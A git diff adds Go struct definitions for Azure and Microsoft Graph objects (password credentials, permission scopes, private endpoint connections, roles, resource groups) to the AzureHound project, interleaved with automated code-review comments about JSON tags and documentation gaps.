--- /dev/null
+++ b/models/azure/password_credential.go
@@ -0,0 +1,47 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Represents a password credential associated with an application or a service principal.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/passwordcredential?view=graph-rest-1.0
+type PasswordCredential struct {
+ // Friendly name for the password. Optional.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // The date and time at which the password expires represented using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Optional.
+ EndDateTime string `json:"endDateTime,omitempty"`
+
+ // Contains the first three characters of the password. Read-only.
+ Hint string `json:"hint,omitempty"`
+
+ // The unique identifier for the password.
+ KeyId uuid.UUID `json:"keyId,omitempty"`
+
+ // Read-only; Contains the strong passwords generated by Azure AD that are 16-64 characters in length.
+ // The generated password value is only returned during the initial POST request to addPassword. There is no way to
+ // retrieve this password in the future.
+ SecretText string `json:"secretText,omitempty"`
+
+ // The date and time at which the password becomes valid. The Timestamp type represents date and time information
+ // using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Optional.
+ StartDateTime string `json:"startDateTime,omitempty"`
+}
diff --git a/models/azure/password_profile.go b/models/azure/password_profile.go
new file mode 100644
index 0000000..9e84fa6
--- /dev/null
+++ b/models/azure/password_profile.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Contains the password profile associated with a user.
+type PasswordProfile struct {
+ // true if the user must change her password on the next login; otherwise false. If not set, default is false.
+ // NOTE: For Azure B2C tenants, set to false and instead use custom policies and user flows to force password reset
+ // at first sign in.
+ ForceChangePasswordNextSignIn bool `json:"forceChangePasswordNextSignIn,omitempty"`
+
+ // If true, at next sign-in, the user must perform a multi-factor authentication (MFA) before being forced to change
+ // their password. The behavior is identical to forceChangePasswordNextSignIn except that the user is required to
+ // first perform a multi-factor authentication before password change. After a password change, this property will
+ // be automatically reset to false. If not set, default is false.
+ ForceChangePasswordNextSignInWithMfa bool `json:"forceChangePasswordNextSignInWithMfa,omitempty"`
+
+ // The password for the user. This property is required when a user is created.
+ // It can be updated, but the user will be required to change the password on the next login.
+ // The password must satisfy minimum requirements as specified by the user’s passwordPolicies property.
+ // By default, a strong password is required.
+ Password string `json:"password,omitempty"`
+}
diff --git a/models/azure/permission_scope.go b/models/azure/permission_scope.go
new file mode 100644
index 0000000..e3f02c2
--- /dev/null
+++ b/models/azure/permission_scope.go
@@ -0,0 +1,67 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Represents the definition of a delegated permission.
+//
+// Delegated permissions can be requested by client applications needing an access token to the API which defined the
+// permissions. Delegated permissions can be requested dynamically, using the scopes parameter in an authorization request
+// to the Microsoft identity platform, or statically, through the requiredResourceAccess collection on the application
+// object.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/permissionscope?view=graph-rest-1.0
+type PermissionScope struct {
+ // A description of the delegated permissions, intended to be read by an administrator granting the permission on
+ // behalf of all users. This text appears in tenant-wide admin consent experiences.
+ AdminConsentDescription string `json:"adminConsentDescription,omitempty"`
+
+ // The permission's title, intended to be read by an administrator granting the permission on behalf of all users.
+ AdminConsentDisplayName string `json:"adminConsentDisplayName,omitempty"`
+
+ // Unique delegated permission identifier inside the collection of delegated permissions defined for a resource
+ // application.
+ Id uuid.UUID `json:"id,omitempty"`
+
+ // When creating or updating a permission, this property must be set to true (which is the default). To delete a
+ // permission, this property must first be set to false. At that point, in a subsequent call, the permission may be
+ // removed.
+ IsEnabled bool `json:"isEnabled,omitempty"`
+
+ // Specifies whether this delegated permission should be considered safe for non-admin users to consent to on behalf
+ // of themselves, or whether an administrator should be required for consent to the permissions. This will be the
+ // default behavior, but each customer can choose to customize the behavior in their organization (by allowing,
+ // restricting or limiting user consent to this delegated permission.)
+ Type string `json:"type,omitempty"`
+
+ // A description of the delegated permissions, intended to be read by a user granting the permission on their own
+ // behalf. This text appears in consent experiences where the user is consenting only on behalf of themselves.
+ UserConsentDescription string `json:"userConsentDescription,omitempty"`
+
+ // A title for the permission, intended to be read by a user granting the permission on their own behalf. This text
+ // appears in consent experiences where the user is consenting only on behalf of themselves.
+ UserConsentDisplayName string `json:"userConsentDisplayName,omitempty"`
+
+ // Specifies the value to include in the scp (scope) claim in access tokens.
+ // Must not exceed 120 characters in length.
+ // Allowed characters are : ! # $ % & ' ( ) * + , - . / : ; < = > ? @ [ ] ^ + _ ` { | } ~, as well as characters in
+ // the ranges 0-9, A-Z and a-z.
+ // Any other character, including the space character, are not allowed.
+ // May not begin with ..
+ Value string `json:"value,omitempty"`
+}
diff --git a/models/azure/plan.go b/models/azure/plan.go
new file mode 100644
index 0000000..b529be5
--- /dev/null
+++ b/models/azure/plan.go
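Review bot: The comment on `Type` in `PermissionScope` (permission_scope.go) explains the consent semantics but never names the values the field can hold, so a reader of collected data cannot tell which string means that an administrator must consent. Adding a line such as `// Possible values: User, Admin.` (as listed in the Graph permissionScope documentation linked on the type) would close that gap. The last line of the `Value` comment, `May not begin with ..`, also reads as if a character was lost; `May not begin with a period (.).` is probably what was intended.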
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies information about the marketplace image used to create the virtual machine. This element is only used for
+// marketplace images. Before you can use a marketplace image from an API, you must enable the image for programmatic
+// use. In the Azure portal, find the marketplace image that you want to use and then click Want to deploy
+// programmatically, Get Started ->. Enter any required information and then click Save.
+type Plan struct {
+ // The plan ID.
+ Name string `json:"name,omitempty"`
+
+ // Specifies the product of the image from the marketplace. This is the same value as Offer under the imageReference
+ // element.
+ Product string `json:"product,omitempty"`
+
+ // The promotion code.
+ PromotionCode string `json:"promotionCode,omitempty"`
+
+ // The publisher ID.
+ Publisher string `json:"publisher,omitempty"`
+}
diff --git a/models/azure/preauthorized_application.go b/models/azure/preauthorized_application.go
new file mode 100644
index 0000000..f4561ee
--- /dev/null
+++ b/models/azure/preauthorized_application.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Lists the client applications that are pre-authorized with the specified permissions to access this application's
+// APIs. Users are not required to consent to any pre-authorized application (for the permissions specified). However,
+// any additional permissions not listed in preAuthorizedApplications (requested through incremental consent for
+// example) will require user consent.
+type PreAuthorizedApplication struct {
+ // The unique identifier for the application.
+ AppId string `json:"appId,omitempty"`
+ // The unique identifiers for the OAuth2PermissionScopes the application requires.
+ PermissionIds []string `json:"permissionIds,omitempty"`
+ // The unique identifiers for the OAuth2PermissionScopes the application requires.
+ DelegatedPermissionIds []string `json:"delegatedPermissionIds,omitempty"`
+}
diff --git a/models/azure/privacy_profile.go b/models/azure/privacy_profile.go
new file mode 100644
index 0000000..91f4fb1
--- /dev/null
+++ b/models/azure/privacy_profile.go
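Review bot: `PermissionIds` and `DelegatedPermissionIds` in `PreAuthorizedApplication` (preauthorized_application.go) carry the identical comment, which leaves unclear why both exist and which one a consumer should read. If they are the same property under two wire names (for instance across API versions, which is not visible from this hunk), each field should say so, e.g. `// Alternate wire name for DelegatedPermissionIds; a response is expected to populate only one of the two.` Because pre-authorized applications skip user consent for the listed scopes, anything that evaluates this struct should read both slices, and the type comment is the place to state that.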
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents a company's privacy profile, which includes a privacy statement URL and a contact person for questions
+// regarding the privacy statement.
+type PrivacyProfile struct {
+ // A valid smtp email address for the privacy statement contact.
+ // Not required.
+ ContactEmail string `json:"contactEmail,omitempty"`
+
+ // The URL that directs to the company's privacy statement.
+ // A valid URL format that begins with http:// or https://.
+ // Maximum length is 255 characters.
+ // Not required.
+ StatementUrl string `json:"statementUrl,omitempty"`
+}
diff --git a/models/azure/private_endpoint.go b/models/azure/private_endpoint.go
new file mode 100644
index 0000000..1f48810
--- /dev/null
+++ b/models/azure/private_endpoint.go
@@ -0,0 +1,23 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type PrivateEndpoint struct {
+ // Full identifier of the private endpoint resource.
+ Id string `json:"id,omitempty"`
+}
diff --git a/models/azure/private_endpoint_connection.go b/models/azure/private_endpoint_connection.go
new file mode 100644
index 0000000..83e31a4
--- /dev/null
+++ b/models/azure/private_endpoint_connection.go
@@ -0,0 +1,28 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Private endpoint connection item.
+type PrivateEndpointConnection struct {
+ Entity
+
+ Name string `json:"name,omitempty"`
+ Type string `json:"type,omitempty"`
+
+ Properties PrivateEndpointConnectionProperties `json:"properties,omitempty"`
+}
diff --git a/models/azure/private_endpoint_connection_item.go b/models/azure/private_endpoint_connection_item.go
new file mode 100644
index 0000000..7a74555
--- /dev/null
+++ b/models/azure/private_endpoint_connection_item.go
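Review bot: The `omitempty` option on `Properties` in `PrivateEndpointConnection` has no effect, because encoding/json never treats a struct value as empty and will always write a `"properties"` object. If the field should disappear when the API returned nothing, declare it as `Properties *PrivateEndpointConnectionProperties` with the same tag; otherwise drop the option so the tag does not promise behaviour it cannot deliver. The same applies to the struct-typed fields of `PrivateEndpointConnectionItem`, `PrivateEndpointConnectionProperties`, `PrivateEndpointConnectionResource`, `PushSettings`, `ResourceGroup`, `RoleAssignment`, `ScheduledEventsProfile` and `SecurityProfile` added later in this patch.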
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Private endpoint connection item.
+type PrivateEndpointConnectionItem struct {
+ // Modified whenever there is a change in the state of private endpoint connection.
+ Etag string `json:"etag,omitempty"`
+
+ // Id of private endpoint connection.
+ Id string `json:"id,omitempty"`
+
+ Properties ConnectionItemProperties `json:"properties,omitempty"`
+}
diff --git a/models/azure/private_endpoint_connection_properties.go b/models/azure/private_endpoint_connection_properties.go
new file mode 100644
index 0000000..7998174
--- /dev/null
+++ b/models/azure/private_endpoint_connection_properties.go
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Private endpoint connection item.
+type PrivateEndpointConnectionProperties struct {
+ GroupIds []string `json:"groupIds,omitempty"`
+ PrivateEndpoint Entity `json:"privateEndpoint,omitempty"`
+ PrivateLinkServiceConnectionState PrivateLinkServiceConnectionStateProperty `json:"privateLinkServiceConnectionState,omitempty"`
+}
+
+type PrivateLinkServiceConnectionStateProperty struct {
+ ActionsRequired string `json:"actionsRequired,omitempty"`
+ Description string `json:"description,omitempty"`
+ Status string `json:"status,omitempty"`
+}
diff --git a/models/azure/private_endpoint_connection_resource.go b/models/azure/private_endpoint_connection_resource.go
new file mode 100644
index 0000000..f883ab8
--- /dev/null
+++ b/models/azure/private_endpoint_connection_resource.go
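Review bot: `PrivateLinkServiceConnectionStateProperty` repeats the three fields of `PrivateLinkServiceConnectionState` (added in private_link_service_connection_state.go by this same patch) but types `Status` as a plain `string` where the other uses `enums.EndpointConnectionStatus`. Two shapes for the same approval state mean some callers will compare against the enum and others against raw strings, which is easy to get wrong when deciding whether a connection is approved. Unless the other type is deliberately key-vault specific, as its comment hints, reuse it here (`PrivateLinkServiceConnectionState PrivateLinkServiceConnectionState` with the same tag) or document on this type why a separate definition is needed. The doc comment `// Private endpoint connection item.` is also copied from `PrivateEndpointConnectionItem`; for this type something like `// PrivateEndpointConnectionProperties holds the group IDs, endpoint reference and link state of a private endpoint connection.` would describe what it is.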
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Private endpoint connection item.
+type PrivateEndpointConnectionResource struct {
+ Id string `json:"id,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties ConnectionItemProperties `json:"properties,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/private_link_service_connection_state.go b/models/azure/private_link_service_connection_state.go
new file mode 100644
index 0000000..419bd10
--- /dev/null
+++ b/models/azure/private_link_service_connection_state.go
@@ -0,0 +1,32 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+// An object that represents the approval state of the private link connection.
+type PrivateLinkServiceConnectionState struct {
+ // A message indicating if changes on the service provider require any updates on the consumer.
+ ActionsRequired string `json:"actionsRequired,omitempty"`
+
+ // The reason for approval or rejection.
+ Description string `json:"description,omitempty"`
+
+ // Indicates whether the connection has been approved, rejected or removed by the key vault owner.
+ Status enums.EndpointConnectionStatus `json:"status,omitempty"`
+}
diff --git a/models/azure/provisioned_plan.go b/models/azure/provisioned_plan.go
new file mode 100644
index 0000000..c16b43e
--- /dev/null
+++ b/models/azure/provisioned_plan.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ProvisionedPlan struct {
+ // For example, “Enabled”.
+ CapabilityStatus string `json:"capabilityStatus,omitempty"`
+
+ // For example, “Success”.
+ ProvisioningStatus string `json:"provisioningStatus,omitempty"`
+
+ // The name of the service; for example, “AccessControlS2S”
+ Service string `json:"service,omitempty"`
+}
diff --git a/models/azure/public_client_application.go b/models/azure/public_client_application.go
new file mode 100644
index 0000000..71356d8
--- /dev/null
+++ b/models/azure/public_client_application.go
@@ -0,0 +1,26 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies settings for non-web app or non-web API (for example, mobile or other public clients such as an installed
+// application running on a desktop device).
+type PublicClientApplication struct {
+ // Specifies the URLs where user tokens are sent for sign-in, or the redirect URIs where OAuth 2.0 authorization
+ // codes and access tokens are sent.
+ RedirectUris []string `json:"redirectUris,omitempty"`
+}
diff --git a/models/azure/push_settings.go b/models/azure/push_settings.go
new file mode 100644
index 0000000..85a7dee
--- /dev/null
+++ b/models/azure/push_settings.go
@@ -0,0 +1,33 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type PushSettings struct {
+ Id string `json:"id,omitempty"`
+ Kind string `json:"kind,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties PushSettingsProperties `json:"properties,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+type PushSettingsProperties struct {
+ DynamicTagsJson string `json:"dynamicTagsJson,omitempty"`
+ IsPushEnabled bool `json:"isPushEnabled,omitempty"`
+ TagWhitelistJson string `json:"tagWhitelistJson,omitempty"`
+ TagsRequiringAuth string `json:"tagsRequiringAuth,omitempty"`
+}
diff --git a/models/azure/required_resource_access.go b/models/azure/required_resource_access.go
new file mode 100644
index 0000000..1df51f4
--- /dev/null
+++ b/models/azure/required_resource_access.go
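Review bot: `IsPushEnabled bool` with `omitempty` in `PushSettingsProperties` is left out of marshalled output whenever it is false, so a consumer of the JSON cannot tell "disabled" from "not collected". The same pattern is on `Role.IsBuiltIn`, `Role.IsEnabled`, the two `RoutingPreference.Publish*` flags and `SecurityProfile.EncryptionAtHost` later in this patch, and there the explicit `false` is the finding a defender cares about (a VM without host encryption, a role not enabled for assignment). If these structs are serialised again after collection, which the tags suggest but the hunk does not show, either drop `omitempty` from the booleans or make them `*bool`, e.g. `IsPushEnabled *bool` with the same tag.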
@@ -0,0 +1,45 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/gofrs/uuid"
+)
+
+// Object used to specify an OAuth 2.0 permission scope or an app role that an application requires.
+type ResourceAccess struct {
+ // The unique identifier for one of the OAuth2PermissionScopes or AppRole instances that the resource application
+ // exposes.
+ Id uuid.UUID `json:"id,omitempty"`
+
+ // Specifies whether the {@link Id} property references an OAuth2PermissionScope or AppRole.
+ Type enums.AccessType `json:"type,omitempty"`
+}
+
+// Specifies the set of OAuth 2.0 permission scopes and app roles under the specified resource that an application
+// requires access to. The application may request the specified OAuth 2.0 permission scopes or app roles through the
+// requiredResourceAccess property.
+type RequiredResourceAccess struct {
+ // The list of OAuth2.0 permission scopes and app roles that the application requires from the specified resource.
+ ResourceAccess []ResourceAccess `json:"resourceAccess,omitempty"`
+
+ // The unique identifier for the resource that the application requires access to. This should be equal to the
+ // {@link AppId} declared on the target resource application.
+ ResourceAppId string `json:"resourceAppId,omitempty"`
+}
diff --git a/models/azure/resource_group.go b/models/azure/resource_group.go
new file mode 100644
index 0000000..3f73076
--- /dev/null
+++ b/models/azure/resource_group.go
@@ -0,0 +1,41 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ResourceGroup struct {
+ Entity
+
+ // The location of the resource group. It cannot be changed after the resource group has been created. It must be
+ // one of the supported Azure locations.
+ Location string `json:"location,omitempty"`
+
+ // The ID of the resource that manages this resource group.
+ ManagedBy string `json:"managedBy,omitempty"`
+
+ // The name of the resource group.
+ Name string `json:"name,omitempty"`
+
+ // The resource group properties.
+ Properties ResourceGroupProperties `json:"properties,omitempty"`
+
+ // The tags attached to the resource group.
+ Tags map[string]string `json:"tags,omitempty"`
+
+ // The type of the resource group.
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/resource_group_props.go b/models/azure/resource_group_props.go
new file mode 100644
index 0000000..29c60f1
--- /dev/null
+++ b/models/azure/resource_group_props.go
@@ -0,0 +1,22 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ResourceGroupProperties struct {
+ ProvisioningState string `json:"provisioningState,omitempty"`
+}
diff --git a/models/azure/resource_reference.go b/models/azure/resource_reference.go
new file mode 100644
index 0000000..28cbb17
--- /dev/null
+++ b/models/azure/resource_reference.go
@@ -0,0 +1,25 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type ResourceReference struct {
+ Entity
+
+ Name string `json:"name,omitempty"`
+ Type string `json:"type,omitempty"`
+}
diff --git a/models/azure/role.go b/models/azure/role.go
new file mode 100644
index 0000000..30a25c1
--- /dev/null
+++ b/models/azure/role.go
@@ -0,0 +1,69 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// A role definition is a collection of permissions in Azure Active Directory (Azure AD) listing the operations that can
+// be performed and the resources against which they can performed.
+type Role struct {
+ DirectoryObject
+
+ // The description for the role. Read-only when isBuiltIn is true.
+ Description string `json:"description,omitempty"`
+
+ // The display name for the role.
+ //
+ // Read-only when isBuiltIn is true
+ // Required
+ // Supports $filter (eq, in).
+ DisplayName string `json:"displayName,omitempty"`
+
+ // Flag indicating whether the role definition is part of the default set included in
+ // Azure Active Directory (Azure AD) or a custom definition.
+ //
+ // Read-only
+ // Supports $filter (eq, in)
+ IsBuiltIn bool `json:"isBuiltIn,omitempty"`
+
+ // Flag indicating whether the role is enabled for assignment.
+ // If false the role is not available for assignment.
+ //
+ // Read-only when isBuiltIn is true
+ IsEnabled bool `json:"isEnabled,omitempty"`
+
+ // List of the scopes or permissions the role definition applies to.
+ // Currently only `/` is supported.
+ //
+ // Read-only when isBuiltIn is true
+ // Note: DO NOT USE. This will be deprecated soon. Attach scope to role assignment.
+ ResourceScopes []string `json:"resourceScopes,omitempty"`
+
+ // List of permissions included in the role.
+ //
+ // Read-only when isBuiltIn is true
+ // Required
+ RolePermissions []RolePermission `json:"rolePermissions,omitempty"`
+
+ // Custom template identifier that can be set when isBuiltIn is false but is read-only when isBuiltIn is true.
+ // This identifier is typically used if one needs an identifier to be the same across different directories.
+ TemplateId string `json:"templateId,omitempty"`
+
+ // Indicates version of the role definition.
+ //
+ // Read-only when isBuiltIn is true
+ Version string `json:"version,omitempty"`
+}
diff --git a/models/azure/role_assignment.go b/models/azure/role_assignment.go
new file mode 100644
index 0000000..07ea735
--- /dev/null
+++ b/models/azure/role_assignment.go
@@ -0,0 +1,47 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
